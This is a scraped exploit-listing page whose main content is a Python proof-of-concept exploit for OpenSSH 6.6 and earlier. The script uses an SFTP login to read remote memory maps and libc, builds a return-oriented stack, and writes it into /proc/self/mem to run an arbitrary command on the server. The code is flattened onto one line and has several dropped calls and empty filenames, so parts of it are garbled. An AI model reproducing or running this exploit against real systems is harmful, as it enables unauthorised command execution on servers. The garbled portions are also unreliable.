openssh < 6.6 sftp command execution

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openssh < 6.6 sftp command execution Code Code...
# OpenSSH <= 6.6 SFTP misconfiguration exploit for 32/64bit Linux # The original discovery by Jann Horn: # # Adam Simuntis :: # Mindaugas Slusnys :: import paramiko import sys import time from pwn import * # parameters cmd = 'touch /tmp/pwn; touch /tmp/pwn2' host = '' port = 22 username = 'secforce' password = 'secforce' # connection ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(hostname = host, port = port, username = username, password = password) sftp = ssh.open_sftp() # parse /proc/self/maps to get addresses"Analysing /proc/self/maps on remote system") sftp.get('/proc/self/maps','maps') with open("maps","r") as f: lines = f.readlines() for line in lines: words = line.split() addr = words[0] if ("libc" in line and "r-xp" in line): path = words[-1] addr = addr.split('-') BITS = 64 if len(addr[0]) > 8 else 32 print "[+] {}bit libc mapped @ {}-{}, path: {}".format(BITS, addr[0], addr[1], path) libc_base = int(addr[0], 16) libc_path = path if ("[stack]" in line): addr = addr.split("-") saddr_start = int(addr[0], 16) saddr_end = int(addr[1], 16) print "[+] Stack mapped @ {}-{}".format(addr[0], addr[1]) # download remote libc and extract information print "[+] Fetching libc from remote system..\n" sftp.get(str(libc_path), '') e = ELF("") sys_addr = libc_base + e.symbols['system'] exit_addr = libc_base + e.symbols['exit'] # gadgets for the RET slide and system() if BITS == 64: pop_rdi_ret = libc_base + next('\x5f\xc3')) ret_addr = pop_rdi_ret + 1 else: ret_addr = libc_base + next('\xc3')) print "\n[+] system() @ {}".format(hex(sys_addr)) print "[+] 'ret' @ {}".format(hex(ret_addr)) if BITS == 64: print "[+] 'pop rdi; ret' @ {}\n".format(hex(pop_rdi_ret)) with'/proc/self/mem','rw') as f: if f.writable(): print "[+] We have r/w permissions for /proc/self/mem! All Good." else: print "[-] Fatal error. No r/w permission for mem." sys.exit(0)"Patching /proc/self/mem on the remote system") stack_size = saddr_end - saddr_start new_stack = "" print "[+] Pushing new stack to {}.. fingers crossed ;))".format(hex(saddr_start)) #sleep(20) if BITS == 32: new_stack += p32(ret_addr) * (stack_size/4) new_stack = cmd + "\x00" + new_stack[len(cmd)+1:-12] new_stack += p32(sys_addr) new_stack += p32(exit_addr) new_stack += p32(saddr_start) else: new_stack += p64(ret_addr) * (stack_size/8) new_stack = cmd + "\x00" + new_stack[len(cmd)+1:-32] new_stack += p64(pop_rdi_ret) new_stack += p64(saddr_start) new_stack += p64(sys_addr) new_stack += p64(exit_addr) # debug info with open("fake_stack","w") as lg: lg.write(new_stack) # write cmd to top off the stack f.write(cmd + "\x00") # write the rest from bottom up, we're going to crash at some point for off in range(stack_size - 32000, 0, -32000): cur_addr = saddr_start + off try: f.write(new_stack[off:off+32000]) except: print "Stack write failed - that's probably good!" print "Check if you command was executed..." sys.exit(0) sftp.close() ssh.close()

Openssh < 6.6 sftp command execution Vulnerability / Exploit Source : Openssh < 6.6 sftp command execution

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